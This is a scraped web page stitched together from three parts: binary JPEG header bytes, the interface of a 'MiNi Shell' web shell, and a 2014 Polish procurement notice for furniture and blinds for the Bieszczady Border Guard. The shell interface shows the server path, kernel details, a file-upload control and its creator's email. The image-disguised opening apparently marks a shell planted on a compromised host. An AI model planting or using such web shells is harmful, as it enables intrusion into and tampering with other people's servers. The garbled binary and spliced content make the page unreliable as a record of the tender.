JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141010/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141010/214765-N-2014.html

<p class="kh_header"><b>Przemyśl: Dostawa sprzętu kwaterunkowego dla Bieszczadzkiego Oddziału Straży Granicznej w Przemyślu</b><br>
<b>Numer ogłoszenia: 214765 - 2014; data zamieszczenia: 10.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Bieszczadzki Oddział Straży Granicznej , ul. Adama Mickiewicza 34, 37-700 Przemyśl, woj. podkarpackie, tel. 016 6732153, 6732087, faks 016 6763271.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bieszczadzki.strazgraniczna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu kwaterunkowego dla Bieszczadzkiego Oddziału Straży Granicznej w Przemyślu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa sprzętu kwaterunkowego dla Bieszczadzkiego Oddziały Straży Granicznej w Przemyślu.
Przedmiot Zamówienia został podzielony na następujące pakiety:
Pakiet A zamówienia - Meble - meble biurowe, szafy ubraniowe, szafki kuchenne, regały, wersalki, tapczany.
Pakiet B zamówienia - Krzesła, stoły - taborety, fotele, ławki.
Pakiet C zamówienia - Regały magazynowe.
Pakiet D zamówienia - Rolety okienne.
Przedmiot zamówienia został szczegółowo opisany w tabelach nr 1, 2, 3, 4, stanowiących załączniki do Druku ofertowego. 
Zamawiający dopuszcza składanie ofert równoważnych dla przedmiotu zamówienia określonego w Pakiecie B poz. 2, 3, 4.
Przez ofertę równoważną należy rozumieć produkt o cechach technicznych, jakościowych i funkcjonalnych, odpowiadających cechom technicznym, jakościowym i funkcjonalnym wskazanym w opisie przedmiotu zamówienia lecz oznaczonych innym znakiem towarowym, patentem lub pochodzeniem. W takim przypadku Wykonawca w tabeli nr 2, stanowiącej załącznik do Druku ofertowego, wskaże nazwę producenta oraz dołączy karty opisowe lub karty charakterystyki, lub inne dokumenty dotyczące oferowanych produktów, z których wynikać będzie zachowanie warunków równoważności w zakresie parametrów i wykonania.
Zamawiający wymaga aby dostarczony przedmiot zamówienia był fabrycznie nowy, kompletny nie używany oraz nie remontowany.
Na dostarczony przedmiot zamówienia Wykonawca udzieli zamawiającemu gwarancję na okres 24 miesięcy, liczony od dnia podpisania protokołu odbioru.
Wykonawca dostarczy przedmiot zamówienia na własny koszt  i ryzyko, jego własnym transportem.
Na Wykonawcy ciąży ryzyko poniesienia kosztów wynikających z utraty lub uszkodzenia przedmiotu zamówienia w czasie transportu.
Wykonawca wraz z przedmiotem zamówienia dostarczy Zamawiającemu w języku polskim instrukcje użytkowe, pisemne gwarancje, certyfikaty, atesty.
Miejscem dostawy przedmiotu zamówienia jest:
dla Pakietów A, B, C - siedziba Zamawiającego w Przemyślu,
dla Pakietu D - siedziba Zamawiającego w Przemyślu oraz Placówki SG w miejscowościach: Wojtkowa, Czarna Górna.
Wykonawca dostarczy przedmiot zamówienia w dni robocze od poniedziałku do piątku w godz. 7:30 - 15:30.
Wykonawca zobowiązany jest powiadomić Zamawiającego o planowanym terminie dostawy telefonicznie z co najmniej 3-dniowym uprzedzeniem..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.12.12.00-8, 39.14.31.10-0, 39.11.20.00-0, 39.11.31.00-3, 39.14.11.00-3, 39.51.54.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełniania przez Wykonawce tego warunku Zamawiający nie ustanawia szczegółowych warunków w niniejszym postępowaniu o udzielenie zamówienia.
Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia wg formularza stanowiącego Załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełniania przez Wykonawce tego warunku Zamawiający nie ustanawia szczegółowych warunków w niniejszym postępowaniu o udzielenie zamówienia.
Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia wg formularza stanowiącego Załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełniania przez Wykonawce tego warunku Zamawiający nie ustanawia szczegółowych warunków w niniejszym postępowaniu o udzielenie zamówienia.
Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia wg formularza stanowiącego Załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełniania przez Wykonawce tego warunku Zamawiający nie ustanawia szczegółowych warunków w niniejszym postępowaniu o udzielenie zamówienia.
Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia wg formularza stanowiącego Załącznik nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie spełniania przez Wykonawce tego warunku Zamawiający nie ustanawia szczegółowych warunków w niniejszym postępowaniu o udzielenie zamówienia.
Wykonawca potwierdza spełnianie tego warunku poprzez złożenie oświadczenia wg formularza stanowiącego Załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Opis oferowanego sprzętu z wyszczególnieniem wszystkich parametrów jak w opisie przedmiotu zamówienia - w przypadku zaoferowania produktów równoważnych dla poz. nr 2, 3, 4 w Pakiecie B.
2. Pełnomocnictwo - w przypadku podpisania oferty wraz z innymi dokumentami oraz poświadczenia za zgodność z oryginałem kopii dokumentów  przez osobę/osoby nie wymienione w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www. bieszczadzki.strazgraniczna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Bieszczadzki Oddział Straży Granicznej, ul. Mickiewicza 34, 37-700 Przemyśl, Sekcja Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.10.2014 godzina 11:30, miejsce: Bieszczadzki Oddział Straży Granicznej, ul. Mickiewicza 34, 37-700 Przemyśl, Kancelaria Jawna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet A zamówienia - Meble - meble biurowe, szafy ubraniowe, szafki kuchenne, regały, wersalki, tapczany..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mebli biurowych, szaf ubraniowych, szafek kuchennych, regałów, wersalek, tapczanów.
Przedmiot zamówienia został szczegółowo opisany w tabeli nr 1 stanowiącej załącznik do Druku ofertowego. 
Zamawiający wymaga aby dostarczony przedmiot zamówienia był fabrycznie nowy, kompletny nie używany oraz nie remontowany.
Na dostarczony przedmiot zamówienia Wykonawca udzieli zamawiającemu gwarancję na okres 24 miesięcy, liczony od dnia podpisania protokołu odbioru.
Wykonawca dostarczy przedmiot zamówienia na własny koszt  i ryzyko, jego własnym transportem.
Na Wykonawcy ciąży ryzyko poniesienia kosztów wynikających z utraty lub uszkodzenia przedmiotu zamówienia w czasie transportu.
Wykonawca wraz z przedmiotem zamówienia dostarczy Zamawiającemu w języku polskim instrukcje użytkowe, pisemne gwarancje, certyfikaty, atesty.
Miejscem dostawy przedmiotu zamówienia jest siedziba Zamawiającego w Przemyślu.
Wykonawca dostarczy przedmiot zamówienia w dni robocze od poniedziałku do piątku w godz. 7:30 - 15:30.
Wykonawca zobowiązany jest powiadomić Zamawiającego o planowanym terminie dostawy telefonicznie z co najmniej 3-dniowym uprzedzeniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.10.00.00-3, 39.12.12.00-8, 39.14.31.10-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet B zamówienia - Krzesła, stoły - taborety, fotele, ławki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa krzeseł, stołów, taboretów, foteli, ławek.
Przedmiot zamówienia został szczegółowo opisany w tabeli nr 2, stanowiącej załącznik do Druku ofertowego. 
Zamawiający dopuszcza składanie ofert równoważnych dla przedmiotu zamówienia określonego w Pakiecie B poz. 2, 3, 4.
Przez ofertę równoważną należy rozumieć produkt o cechach technicznych, jakościowych i funkcjonalnych, odpowiadających cechom technicznym, jakościowym i funkcjonalnym wskazanym w opisie przedmiotu zamówienia lecz oznaczonych innym znakiem towarowym, patentem lub pochodzeniem. W takim przypadku Wykonawca w tabeli nr 2, stanowiącej załącznik do Druku ofertowego, wskaże nazwę producenta oraz dołączy karty opisowe lub karty charakterystyki, lub inne dokumenty dotyczące oferowanych produktów, z których wynikać będzie zachowanie warunków równoważności w zakresie parametrów i wykonania.
Zamawiający wymaga aby dostarczony przedmiot zamówienia był fabrycznie nowy, kompletny nie używany oraz nie remontowany.
Na dostarczony przedmiot zamówienia Wykonawca udzieli zamawiającemu gwarancję na okres 24 miesięcy, liczony od dnia podpisania protokołu odbioru.
Wykonawca dostarczy przedmiot zamówienia na własny koszt  i ryzyko, jego własnym transportem.
Na Wykonawcy ciąży ryzyko poniesienia kosztów wynikających z utraty lub uszkodzenia przedmiotu zamówienia w czasie transportu.
Wykonawca wraz z przedmiotem zamówienia dostarczy Zamawiającemu w języku polskim instrukcje użytkowe, pisemne gwarancje, certyfikaty, atesty.
Miejscem dostawy przedmiotu zamówienia jest siedziba Zamawiającego w Przemyślu.
Wykonawca dostarczy przedmiot zamówienia w dni robocze od poniedziałku do piątku w godz. 7:30 - 15:30.
Wykonawca zobowiązany jest powiadomić Zamawiającego o planowanym terminie dostawy telefonicznie z co najmniej 3-dniowym uprzedzeniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.11.20.00-0, 39.11.31.00-8, 39.11.36.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet C zamówienia - Regały magazynowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa regałów magazynowych.
Przedmiot zamówienia został szczegółowo opisany w tabeli nr 3, stanowiącej załącznik do Druku ofertowego. 
Zamawiający wymaga aby dostarczony przedmiot zamówienia był fabrycznie nowy, kompletny nie używany oraz nie remontowany.
Na dostarczony przedmiot zamówienia Wykonawca udzieli zamawiającemu gwarancję na okres 24 miesięcy, liczony od dnia podpisania protokołu odbioru.
Wykonawca dostarczy przedmiot zamówienia na własny koszt  i ryzyko, jego własnym transportem.
Na Wykonawcy ciąży ryzyko poniesienia kosztów wynikających z utraty lub uszkodzenia przedmiotu zamówienia w czasie transportu.
Wykonawca wraz z przedmiotem zamówienia dostarczy Zamawiającemu w języku polskim instrukcje użytkowe, pisemne gwarancje, certyfikaty, atesty.
Miejscem dostawy przedmiotu zamówienia jest siedziba Zamawiającego w Przemyślu.
Wykonawca dostarczy przedmiot zamówienia w dni robocze od poniedziałku do piątku w godz. 7:30 - 15:30.
Wykonawca zobowiązany jest powiadomić Zamawiającego o planowanym terminie dostawy telefonicznie z co najmniej 3-dniowym uprzedzeniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.14.11.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 19.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet D zamówienia - Rolety okienne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa rolet okiennych.
Przedmiot zamówienia został szczegółowo opisany w tabeli nr 4, stanowiącej załącznik do Druku ofertowego. 
Zamawiający wymaga aby dostarczony przedmiot zamówienia był fabrycznie nowy, kompletny nie używany oraz nie remontowany.
Na dostarczony przedmiot zamówienia Wykonawca udzieli zamawiającemu gwarancję na okres 24 miesięcy, liczony od dnia podpisania protokołu odbioru.
Wykonawca dostarczy przedmiot zamówienia na własny koszt  i ryzyko, jego własnym transportem.
Na Wykonawcy ciąży ryzyko poniesienia kosztów wynikających z utraty lub uszkodzenia przedmiotu zamówienia w czasie transportu.
Wykonawca wraz z przedmiotem zamówienia dostarczy Zamawiającemu w języku polskim instrukcje użytkowe, pisemne gwarancje, certyfikaty, atesty.
Miejscem dostawy przedmiotu zamówienia jest siedziba Zamawiającego w Przemyślu oraz Placówki SG w miejscowościach: Wojtkowa, Czarna Górna.
Wykonawca dostarczy przedmiot zamówienia w dni robocze od poniedziałku do piątku w godz. 7:30 - 15:30.
Wykonawca zobowiązany jest powiadomić Zamawiającego o planowanym terminie dostawy telefonicznie z co najmniej 3-dniowym uprzedzeniem..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.51.54.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 40.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com